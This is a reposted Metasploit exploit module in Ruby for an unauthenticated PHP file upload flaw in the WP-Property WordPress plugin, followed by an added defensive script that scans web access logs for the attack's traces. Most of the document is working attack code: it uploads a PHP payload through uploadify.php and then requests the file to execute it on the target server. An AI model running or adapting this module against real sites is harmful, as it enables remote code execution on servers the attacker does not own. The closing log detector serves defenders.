WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
            'Description'    => %q{
                This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82656' ],
                    [ 'BID', '53787' ],
                    [ 'EDB', '18987'],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
            'method' => 'GET',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
end
Don't ask me what this is or how to use it. I'm talking about msf.
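For defenders, the module above leaves a recognisable trace in web access logs: a POST to uploadify.php followed by a request for a PHP file in the same uploadify directory. The following is an added example, not part of the original post or of Metasploit; it assumes the Apache/nginx "combined" log format, and find_upload_abuse and the sample log lines are hypothetical and constructed for illustration.

```ruby
require 'set'

# Added example: flag the upload-then-request pattern in access logs.
# Assumes "combined" log format; all names here are hypothetical.
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120
  203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 64
  203.0.113.9 - - [04/Jan/2013:19:41:13 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0
  198.51.100.7 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900
LOG

def find_upload_abuse(log_text)
  uploaders = Set.new # clients that have POSTed to uploadify.php
  findings = []
  log_text.each_line do |line|
    next unless (m = LOG_LINE.match(line))
    path = m[:path].split('?', 2).first
    next unless path =~ UPLOADIFY_DIR
    file = File.basename(path)
    entry = { ip: m[:ip], time: m[:ts], path: path, status: m[:status].to_i }
    if m[:method] == 'POST' && file == 'uploadify.php'
      # The handler accepts uploads without authentication, so review every POST.
      uploaders << m[:ip]
      findings << entry.merge(kind: :unauthenticated_upload)
    elsif file != 'uploadify.php' && file =~ /\.ph(p\d?|tml)\z/i
      # Assumption: any other PHP file requested from this directory is
      # suspect; allowlist files you know belong to the plugin.
      findings << entry.merge(kind: :uploaded_script_request,
                              same_client_uploaded: uploaders.include?(m[:ip]))
    end
  end
  findings
end

find_upload_abuse(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

A finding of kind uploaded_script_request with status 200 and same_client_uploaded set is the strongest signal; the file name in its path is the one to look for on disk.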
